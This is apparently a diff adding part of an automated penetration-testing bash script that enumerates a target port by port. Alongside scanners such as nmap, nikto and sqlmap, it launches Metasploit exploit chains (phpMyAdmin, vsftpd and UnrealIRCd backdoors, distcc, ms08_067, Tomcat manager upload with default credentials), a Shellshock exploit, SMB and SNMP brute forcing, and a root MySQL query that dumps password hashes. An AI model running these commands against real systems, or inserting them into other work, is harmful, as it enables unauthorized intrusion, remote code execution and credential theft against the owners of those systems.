+	echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure -I -X TRACE http://$TARGET | grep TRACE | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking for META tags on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure http://$TARGET | egrep -i meta --color=auto | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure -x http://$TARGET:80 -L http://crowdshield.com/.testing/openproxy.txt | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Enumerating software on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure -I http://$TARGET | egrep -i "Server:|X-Powered|ASP|JSP|PHP|.NET" | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking if Strict-Transport-Security is enabled on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure -I http://$TARGET/ | egrep -i "Strict-Transport-Security" | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking for Flash cross-domain policy on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure http://$TARGET/crossdomain.xml | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking for Silverlight cross-domain policy on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure http://$TARGET/clientaccesspolicy.xml | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking for HTML5 cross-origin resource sharing on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure -I http://$TARGET | egrep -i "Access-Control-Allow-Origin" | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Retrieving robots.txt on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure http://$TARGET/robots.txt | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Retrieving sitemap.xml on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure http://$TARGET/sitemap.xml | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking cookie attributes on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure -I http://$TARGET | egrep -i "Cookie:" | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking for ASP.NET Detailed Errors on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure http://$TARGET/%3f.jsp | egrep -i 'Error|Exception' | tail -n 10
+	curl -s --insecure http://$TARGET/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10
+	echo ""
+	echo -e "$RESET"
+	echo -e "$OKGREEN + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +$RESET"
+	nikto -h http://$TARGET 
+	echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
+	echo -e "$OKRED[+]$RESET ;/Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port80.jpg"
+	cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg
+	
+	if [ "$MODE" = "web" ];
+	then
+		echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
+		echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
+		nmap -A -sV -T5 -p 80 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal
+		echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
+		dirb http://$TARGET
+		echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
+		wpscan --url http://$TARGET --batch
+		echo ""
+		wpscan --url http://$TARGET/wordpress/ --batch
+		echo ""
+		echo -e "$OKGREEN + -- ----------------------------=[Running CMSMap]=-------------------------- -- +$RESET"
+		python $CMSMAP -t http://$TARGET
+		echo ""
+		python $CMSMAP -t http://$TARGET/wordpress/
+		echo ""
+		echo -e "$OKGREEN + -- ----------------------------=[Running Arachni Web Application Scan]=---- -- +$RESET"
+		mkdir -p $INSTALL_DIR/loot/web/$TARGET-http/ 2> /dev/null
+		arachni --report-save-path=$INSTALL_DIR/loot/web/$TARGET-http/ --output-only-positives http://$TARGET
+		cd $INSTALL_DIR/loot/web/$TARGET-http/
+		arachni_reporter $INSTALL_DIR/loot/web/$TARGET-http/*.afr --report=html:outfile=$INSTALL_DIR/loot/web/$TARGET-http/arachni.zip
+		unzip $INSTALL_DIR/loot/web/$TARGET-http/arachni.zip
+		cd $INSTALL_DIR
+		echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET"
+		sqlmap -u "http://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a
+		echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET"
+		msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
+		echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
+		python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80
+	fi
+	
+	if [ $SCAN_TYPE == "DOMAIN" ];
+	then
+		echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------- -- +$RESET"
+		goohak $TARGET > /dev/null
+		echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +$RESET"
+		php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
+		rm -Rf output/ cookie.txt exploits.conf
+		GHDB="1"
+	fi
+fi
+
+if [ -z "$port_110" ];
+then
+	echo -e "$OKRED + -- --=[Port 110 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 110 opened... running tests...$RESET"
+	nmap -A -sV -T5 --script=pop* -p 110 $TARGET
+fi
+
+if [ -z "$port_111" ];
+then
+	echo -e "$OKRED + -- --=[Port 111 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 111 opened... running tests...$RESET"
+	showmount -a $TARGET
+	showmount -d $TARGET
+	showmount -e $TARGET
+fi
+
+if [ -z "$port_135" ];
+then
+	echo -e "$OKRED + -- --=[Port 135 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 135 opened... running tests...$RESET"
+	rpcinfo -p $TARGET
+	nmap -A -p 135 -T5 --script=rpc* $TARGET
+fi
+
+if [ -z "$port_139" ];
+then
+	echo -e "$OKRED + -- --=[Port 139 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 139 opened... running tests...$RESET"
+	SMB="1"
+	echo -e "$OKGREEN + -- ----------------------------=[Running SMB Enumeration]=----------------- -- +$RESET"
+	enum4linux $TARGET
+	python $SAMRDUMP $TARGET
+	nbtscan $TARGET
+	nmap -A -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
+	msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
+fi
+
+if [ -z "$port_161" ];
+then
+	echo -e "$OKRED + -- --=[Port 161 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 161 opened... running tests...$RESET"
+	for a in `cat /usr/share/brutex/wordlists/snmp-strings.txt`; do snmpwalk $TARGET -c $a; done;
+	nmap -sU -p 161 --script=snmp* $TARGET
+fi
+
+if [ -z "$port_162" ];
+then
+	echo -e "$OKRED + -- --=[Port 162 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 162 opened... running tests...$RESET"
+	for a in `cat /usr/share/brutex/wordlists/snmp-strings.txt`; do snmpwalk $TARGET -c $a; done;
+	nmap -A -p 162 --script=snmp* $TARGET
+fi
+
+if [ -z "$port_389" ];
+then
+	echo -e "$OKRED + -- --=[Port 389 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 389 opened... running tests...$RESET"
+	nmap -A -p 389 -T5 --script=ldap* $TARGET
+fi
+
+if [ -z "$port_443" ];
+then
+	echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET"
+	echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
+	wafw00f https://$TARGET
+	echo ""
+	echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
+	whatweb https://$TARGET
+	echo ""
+	echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET"
+	sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET
+	sslscan --no-failed $TARGET 
+	testssl $TARGET
+	echo ""
+	cd $PLUGINS_DIR/MassBleed
+	./massbleed $TARGET port 443
+	cd $INSTALL_DIR
+	echo -e "$OKGREEN + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +$RESET"
+	echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure -I https://$TARGET | egrep -i 'X-Content' | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking if X-Frame options are enabled on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure -I https://$TARGET | egrep -i 'X-Frame' | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking if X-XSS-Protection header is enabled on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure -I https://$TARGET | egrep -i 'X-XSS' | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking HTTP methods on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure -I -X OPTIONS https://$TARGET | grep Allow
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure -I -X TRACE https://$TARGET | grep TRACE
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking for META tags on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure https://$TARGET | egrep -i meta --color=auto | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE"
+	curl -x https://$TARGET:443 -L https://crowdshield.com/.testing/openproxy.txt -s --insecure | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Enumerating software on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure -I https://$TARGET | egrep -i "Server:|X-Powered|ASP|JSP|PHP|.NET" | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking if Strict-Transport-Security is enabled on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure -I https://$TARGET/ | egrep -i "Strict-Transport-Security" | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking for Flash cross-domain policy on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure https://$TARGET/crossdomain.xml | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking for Silverlight cross-domain policy on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure https://$TARGET/clientaccesspolicy.xml | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking for HTML5 cross-origin resource sharing on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure -I https://$TARGET | egrep -i "Access-Control-Allow-Origin" | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Retrieving robots.txt on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure https://$TARGET/robots.txt | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Retrieving sitemap.xml on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure https://$TARGET/sitemap.xml | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking cookie attributes on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure -I https://$TARGET | egrep -i "Cookie:" | tail -n 10
+	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking for ASP.NET Detailed Errors on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure https://$TARGET/%3f.jsp | egrep -i 'Error|Exception' | tail -n 10
+	curl -s --insecure https://$TARGET/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10
+	echo ""
+	echo -e "$RESET"
+	echo -e "$OKGREEN + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +$RESET"
+	nikto -h https://$TARGET 
+	echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
+	cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg
+	echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port443.jpg"
+	
+	if [ "$MODE" = "web" ];
+	then
+		echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
+		nmap -A -sV -T5 -p 443 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal
+		echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
+		dirb https://$TARGET
+		echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
+		wpscan --url https://$TARGET --batch
+		echo ""
+		wpscan --url https://$TARGET/wordpress/ --batch
+		echo -e "$OKGREEN + -- ----------------------------=[Running CMSMap]=-------------------------- -- +$RESET"
+		python $CMSMAP -t https://$TARGET
+		echo ""
+		python $CMSMAP -t https://$TARGET/wordpress/
+		echo ""
+		if [ $ARACHNI == "1" ];
+		then
+			echo -e "$OKGREEN + -- ----------------------------=[Skipping Arachni Scan]=------------------- -- +$RESET"
+		else
+			echo -e "$OKGREEN + -- ----------------------------=[Running Arachni Web Application Scan]=---- -- +$RESET"
+			mkdir -p $INSTALL_DIR/loot/web/$TARGET-https/ 2> /dev/null
+			arachni --report-save-path=$INSTALL_DIR/loot/web/$TARGET-https/ --output-only-positives https://$TARGET
+			cd $INSTALL_DIR/loot/web/$TARGET-https/
+			arachni_reporter $INSTALL_DIR/loot/web/$TARGET-https/*.afr --report=html:outfile=$INSTALL_DIR/loot/web/$TARGET-https/arachni.zip
+			unzip $INSTALL_DIR/loot/web/$TARGET-https/arachni.zip
+			cd $INSTALL_DIR
+		fi
+		echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET"
+		sqlmap -u "https://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a
+		echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET"
+		msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
+		echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
+		python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 443 --ssl
+	fi
+	
+	if [ $SCAN_TYPE == "DOMAIN" ];
+	then
+		if [ -z $GHDB ];
+		then
+			echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=---------- -- +$RESET"
+			goohak $TARGET > /dev/null
+			echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=----------- -- +$RESET"
+			php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
+			rm -Rf output/ cookie.txt exploits.conf
+		fi
+	fi
+fi
+
+if [ -z "$port_445" ];
+then
+	echo -e "$OKRED + -- --=[Port 445 closed... skipping.$RESET"
+elif [ $SMB = "1" ];
+then
+	echo -e "$OKRED + -- --=[Port 445 scanned... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 445 opened... running tests...$RESET"
+	enum4linux $TARGET
+	python $SAMRDUMP $TARGET
+	nbtscan $TARGET
+	nmap -A -sV -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
+	msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
+fi
+
+if [ -z "$port_512" ];
+then
+	echo -e "$OKRED + -- --=[Port 512 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 512 opened... running tests...$RESET"
+	nmap -A -sV -T5 -p 512 --script=rexec* $TARGET
+fi
+
+if [ -z "$port_513" ]
+then
+	echo -e "$OKRED + -- --=[Port 513 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 513 opened... running tests...$RESET"
+	nmap -A -sV -T5 -p 513 --script=rlogin* $TARGET
+fi
+
+if [ -z "$port_514" ];
+then
+	echo -e "$OKRED + -- --=[Port 514 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 514 opened... running tests...$RESET"
+	amap $TARGET 514 -A
+fi
+
+if [ -z "$port_1433" ];
+then
+	echo -e "$OKRED + -- --=[Port 1433 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 1433 opened... running tests...$RESET"
+	nmap -A -sV -T5 --script=mssql* -p 1433 $TARGET
+fi
+
+if [ -z "$port_2049" ];
+then
+	echo -e "$OKRED + -- --=[Port 2049 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 2049 opened... running tests...$RESET"
+	nmap -A -sV -T5 --script=nfs* -p 2049 $TARGET
+	rpcinfo -p $TARGET
+	showmount -e $TARGET
+	smbclient -L $TARGET -U " "%" "
+fi
+
+if [ -z "$port_2121" ];
+then
+	echo -e "$OKRED + -- --=[Port 2121 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 2121 opened... running tests...$RESET"
+	nmap -A -sV -T5 --script=ftp* -p 2121 $TARGET
+	msfconsole -x "setg PORT 2121; use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
+fi
+
+if [ -z "$port_3306" ];
+then
+	echo -e "$OKRED + -- --=[Port 3306 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 3306 opened... running tests...$RESET"
+	nmap -A -sV --script=mysql* -p 3306 $TARGET
+	mysql -u root -h $TARGET -e 'SHOW DATABASES; SELECT Host,User,Password FROM mysql.user;'
+fi
+
+if [ -z "$port_3310" ];
+then
+	echo -e "$OKRED + -- --=[Port 3310 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 3310 opened... running tests...$RESET"
+	nmap -A -p 3310 -T5 -sV --script clamav-exec $TARGET
+fi
+
+if [ -z "$port_3128" ];
+then
+	echo -e "$OKRED + -- --=[Port 3128 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 3128 opened... running tests...$RESET"
+	nmap -A -p 3128 -T5 -sV --script=*proxy* $TARGET
+fi
+
+if [ -z "$port_3389" ];
+then
+	echo -e "$OKRED + -- --=[Port 3389 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 3389 opened... running tests...$RESET"
+	nmap -A -sV -T5 --script=rdp-* -p 3389 $TARGET
+	rdesktop $TARGET &
+fi
+
+if [ -z "$port_3632" ];
+then
+	echo -e "$OKRED + -- --=[Port 3632 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 3632 opened... running tests...$RESET"
+	nmap -A -sV -T5 --script=distcc-* -p 3632 $TARGET
+	msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;"
+fi
+
+if [ -z "$port_8443" ];
+then
+	echo -e "$OKRED + -- --=[Port 4443 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 4443 opened... running tests...$RESET"
+	wafw00f http://$TARGET:4443
+	echo ""
+	whatweb http://$TARGET:4443
+	echo ""
+	xsstracer $TARGET 4443
+	sslscan --no-failed $TARGET:4443
+	sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:4443
+	cd $PLUGINS_DIR/MassBleed
+	./massbleed $TARGET port 4443
+	cd $INSTALL_DIR
+	nikto -h https://$TARGET:4443 
+	cutycapt --url=https://$TARGET:4443 --out=$LOOT_DIR/screenshots/$TARGET-port4443.jpg
+	nmap -A -p 4443 -T5 --script=*proxy* $TARGET
+fi
+
+if [ -z "$port_5432" ];
+then
+	echo -e "$OKRED + -- --=[Port 5432 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 5432 opened... running tests...$RESET"
+	nmap -A -sV --script=pgsql-brute -p 5432 $TARGET
+fi
+
+if [ -z "$port_5800" ];
+then
+	echo -e "$OKRED + -- --=[Port 5800 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 5800 opened... running tests...$RESET"
+	nmap -A -sV -T5 --script=vnc* -p 5800 $TARGET
+fi
+
+if [ -z "$port_5900" ];
+then
+	echo -e "$OKRED + -- --=[Port 5900 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 5900 opened... running tests...$RESET"
+	nmap -A -sV -T5 --script=vnc* -p 5900 $TARGET
+fi
+
+if [ -z "$port_5984" ];
+then
+	echo -e "$OKRED + -- --=[Port 5984 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 5984 opened... running tests...$RESET"
+	nmap -A -sV -T5 --script=couchdb* -p 5984 $TARGET
+	msfconsole -x "use auxiliary/scanner/couchdb/couchdb_enum; set RHOST "$TARGET"; run; exit;"
+fi
+
+if [ -z "$port_6000" ];
+then
+	echo -e "$OKRED + -- --=[Port 6000 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 6000 opened... running tests...$RESET"
+	nmap -A -sV -T5 --script=x11* -p 6000 $TARGET
+fi
+
+if [ -z "$port_6667" ];
+then
+	echo -e "$OKRED + -- --=[Port 6667 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 6667 opened... running tests...$RESET"
+	nmap -A -sV -T5 --script=irc* -p 6667 $TARGET
+	msfconsole -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
+fi
+
+if [ -z "$port_8000" ];
+then
+	echo -e "$OKRED + -- --=[Port 8000 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 8000 opened... running tests...$RESET"
+	wafw00f http://$TARGET:8000
+	echo ""
+	whatweb http://$TARGET:8000
+	echo ""
+	xsstracer $TARGET 8000
+	cd ..
+	nikto -h http://$TARGET:8000 
+	cutycapt --url=http://$TARGET:8000 --out=$LOOT_DIR/screenshots/$TARGET-port8000.jpg
+fi
+
+if [ -z "$port_8100" ];
+then
+	echo -e "$OKRED + -- --=[Port 8100 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 8100 opened... running tests...$RESET"
+	wafw00f http://$TARGET:8100
+	echo ""
+	whatweb http://$TARGET:8100
+	echo ""
+	xsstracer $TARGET 8100
+	sslscan --no-failed $TARGET:8100
+	cd $PLUGINS_DIR/MassBleed
+	./massbleed $TARGET port 8100
+	cd $INSTALL_DIR
+	nikto -h http://$TARGET:8100 
+	cutycapt --url=http://$TARGET:8100 --out=$LOOT_DIR/screenshots/$TARGET-port8100.jpg
+fi
+
+if [ -z "$port_8080" ];
+then
+	echo -e "$OKRED + -- --=[Port 8080 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 8080 opened... running tests...$RESET"
+	wafw00f http://$TARGET:8080
+	echo ""
+	whatweb http://$TARGET:8080
+	echo ""
+	xsstracer $TARGET 8080
+	sslscan --no-failed $TARGET:8080
+	cd $PLUGINS_DIR/MassBleed
+	./massbleed $TARGET port 8080
+	cd $INSTALL_DIR
+	nikto -h http://$TARGET:8080 
+	cutycapt --url=http://$TARGET:8080 --out=$LOOT_DIR/screenshots/$TARGET-port8080.jpg
+	nmap -A -p 8080 -T5 --script=*proxy* $TARGET
+	msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
+	# EXPERIMENTAL - APACHE STRUTS RCE EXPLOIT
+	# msfconsole -x "use exploit/linux/http/apache_struts_rce_2016-3081; setg RHOSTS "$TARGET"; set PAYLOAD linux/x86/read_file; set PATH /etc/passwd; run;"
+fi
+
+if [ -z "$port_8180" ];
+then
+	echo -e "$OKRED + -- --=[Port 8180 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 8180 opened... running tests...$RESET"
+	wafw00f http://$TARGET:8180
+	echo ""
+	whatweb http://$TARGET:8180
+	echo ""
+	xsstracer $TARGET 8180
+	sslscan --no-failed $TARGET:8180
+	sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:8180
+	cd $PLUGINS_DIR/MassBleed
+	./massbleed $TARGET port 8180
+	cd $INSTALL_DIR
+	nikto -h http://$TARGET:8180 
+	cutycapt --url=http://$TARGET:8180 --out=$LOOT_DIR/screenshots/$TARGET-port8180.jpg
+	nmap -p 8180 -T5 --script=*proxy* $TARGET
+	echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET"
+	echo -e "$OKGREEN + -- ----------------------------=[Launching Tomcat Exploits]=--------------- -- +$RESET"
+	msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
+fi
+
+if [ -z "$port_8443" ];
+then
+	echo -e "$OKRED + -- --=[Port 8443 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 8443 opened... running tests...$RESET"
+	wafw00f http://$TARGET:8443
+	echo ""
+	whatweb http://$TARGET:8443
+	echo ""
+	xsstracer $TARGET 8443
+	sslscan --no-failed $TARGET:8443
+	sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:8443
+	cd $PLUGINS_DIR/MassBleed
+	./massbleed $TARGET port 8443
+	cd $INSTALL_DIR
+	nikto -h https://$TARGET:8443 
+	cutycapt --url=https://$TARGET:8443 --out=$LOOT_DIR/screenshots/$TARGET-port8443.jpg
+	nmap -A -p 8443 -T5 --script=*proxy* $TARGET
+fi
+
+if [ -z "$port_8888" ];
+then
+	echo -e "$OKRED + -- --=[Port 8888 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 8888 opened... running tests...$RESET"
+	wafw00f http://$TARGET:8888
+	echo ""
+	whatweb http://$TARGET:8888
+	echo ""
+	xsstracer $TARGET 8888
+	nikto -h http://$TARGET:8888 
